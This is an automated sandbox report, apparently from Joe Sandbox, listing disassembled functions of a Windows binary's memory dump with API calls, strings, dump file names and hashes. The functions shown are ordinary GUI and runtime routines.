                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$CursorLoad
                                                                                                                                                                                                                                                                                    • String ID: 3401032$3401033$3401086$3401087$3401088$[SSD]
                                                                                                                                                                                                                                                                                    • API String ID: 3043871728-3947735280
                                                                                                                                                                                                                                                                                    • Opcode ID: 5db1abb4b4ac81ea5904311cf2473730f01737f5fbad3c3d99fe4835ba4fde45
                                                                                                                                                                                                                                                                                    • Instruction ID: c9e3dbd840687df198e490246c1b34f6b1a62d60348da21d10426e52b8988a23
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5db1abb4b4ac81ea5904311cf2473730f01737f5fbad3c3d99fe4835ba4fde45
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B4196F17543006AD764EB64DC42F9F72A8AF84B10F20C91FB65EA26C0CEBC640547AD
                                                                                                                                                                                                                                                                                    Function 004537A0 Relevance: 15.3, APIs: 10, Instructions: 287COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0045382E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeString
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3341692771-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f91c71cdff771b475ab66cf7fa24957df628f7f2d51a469e190cf7c95d6e8a29
                                                                                                                                                                                                                                                                                    • Instruction ID: be2023aef89e17b54fd3cfd96c880170c5f98da2cba37ae09b4ebda1ed5f38f7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f91c71cdff771b475ab66cf7fa24957df628f7f2d51a469e190cf7c95d6e8a29
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79C1F4B56083448FC310DF69C884A5BFBE9BFC9714F148A5EE9888B361C775E905CB92
                                                                                                                                                                                                                                                                                    Function 0040F790 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32 ref: 0040F806
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001215,00000000,00000000), ref: 0040F82F
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0040F845
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 0040F876
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040F88B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00407E20: CopyRect.USER32(?,?), ref: 00407F0C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00407E20: CopyRect.USER32(?,?), ref: 00407F1E
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001209,00000000,00000000), ref: 0040F9EE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageRectSend$Copy$Client
                                                                                                                                                                                                                                                                                    • String ID: $6
                                                                                                                                                                                                                                                                                    • API String ID: 201260696-4183747533
                                                                                                                                                                                                                                                                                    • Opcode ID: 42de312bba28103fbd9c5fb933112db53f737e9031533f58468e5b08cd7e4db0
                                                                                                                                                                                                                                                                                    • Instruction ID: 8b216fbeb9dde18344444fa578b156f2309188772abd6b45e307a88af5c25f20
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42de312bba28103fbd9c5fb933112db53f737e9031533f58468e5b08cd7e4db0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4E141B15083429FD320DF25C580A9BFBE9FF88704F004A2EF49997381D778A949CB96
                                                                                                                                                                                                                                                                                    Function 005044CB Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 005045EA
                                                                                                                                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 005046F8
                                                                                                                                                                                                                                                                                    • CatchIt.LIBVCRUNTIME ref: 00504749
                                                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 0050484A
                                                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00504865
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                    • API String ID: 4119006552-393685449
                                                                                                                                                                                                                                                                                    • Opcode ID: a65231c7224523d78c135119b38e93c421f23d8deef9d53e41ae7645979b48cb
                                                                                                                                                                                                                                                                                    • Instruction ID: 4c312c5944364cf67c01a2669073ec3c682224089c6a705f39cce00d7300e0bb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a65231c7224523d78c135119b38e93c421f23d8deef9d53e41ae7645979b48cb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5B19DB180020AEFCF14DFA4C8859AEBFB5FF45310F14855AEA156B292D331DA61CF91
                                                                                                                                                                                                                                                                                    Function 00409D40 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CopyRect
                                                                                                                                                                                                                                                                                    • String ID: Bottom$Left$Margin$Right$Top$`=$=
                                                                                                                                                                                                                                                                                    • API String ID: 1989077687-1885521073
                                                                                                                                                                                                                                                                                    • Opcode ID: e266b93fc17dab845a5d8460d54d26b403d0d269895f540772a95358242b67c3
                                                                                                                                                                                                                                                                                    • Instruction ID: 7cbf7df4fec77659c91c3afac7ac99305081f53a3d300e0ff47080e44fb4b669
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e266b93fc17dab845a5d8460d54d26b403d0d269895f540772a95358242b67c3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EB166766043419FC310DF28C881B5BB7E8FB98704F148A2EF58A97391DB75E944CB9A
                                                                                                                                                                                                                                                                                    Function 00418660 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 282windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,113262B6,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102F,00000000,00000000), ref: 004187CD
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004187EF
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 0041899B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001028,00000000,00000000), ref: 004189AF
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 004189C5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001015,00000000,?), ref: 004189DB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CriticalEnterSection
                                                                                                                                                                                                                                                                                    • String ID: %.2f%%$%I64u
                                                                                                                                                                                                                                                                                    • API String ID: 2245208738-2288124401
                                                                                                                                                                                                                                                                                    • Opcode ID: e8a4837ba97be504fd883f7b81f214d570e02bb173e6daae76494a95ea94b1e9
                                                                                                                                                                                                                                                                                    • Instruction ID: e1e33ad56b98f5e84924c458d64c7c6c02eb77d82da0e984fc61a5a5d3d1ca0d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8a4837ba97be504fd883f7b81f214d570e02bb173e6daae76494a95ea94b1e9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EA16E71304201AFD368EB24CD85FAFB7B9AF88704F40491EF64697291DBB4AC45CB5A
                                                                                                                                                                                                                                                                                    Function 00418A70 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 249windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00418B07
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,113262B6,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419480: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0041948D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,?,00000002), ref: 00418BA8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000083FE,?,?), ref: 00418BF6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403D70: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00403D7D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000003), ref: 00418C9F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419460: SendMessageW.USER32(?,0000100C,?,00000002), ref: 00419470
                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(?,open,explorer.exe,?,00000000,00000001), ref: 00418D51
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CriticalEnterExecuteSectionShell
                                                                                                                                                                                                                                                                                    • String ID: /e,/select,"%s%s"$explorer.exe$open
                                                                                                                                                                                                                                                                                    • API String ID: 206244367-2061274879
                                                                                                                                                                                                                                                                                    • Opcode ID: f877a975dfb8fd7e3335437b9cdf50eff5a36e5d2e8446bffb34177b6d077c25
                                                                                                                                                                                                                                                                                    • Instruction ID: 9e016845d88e4024dd1218f79a327356caeee79904b42a6c0a28c628b7da3379
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f877a975dfb8fd7e3335437b9cdf50eff5a36e5d2e8446bffb34177b6d077c25
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2691E0712047009BD710EF24DD85FDAB7E5BF98704F00092EF945AB286DB78E945CBAA
                                                                                                                                                                                                                                                                                    Function 0042CCB0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 192windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000133D,00000000,00000001), ref: 0042CE5B
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105,?,113262B6,?,?,?,?,?,?,?,?,?,004217B6), ref: 0042CEBD
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0042CEF4
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042CF49
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
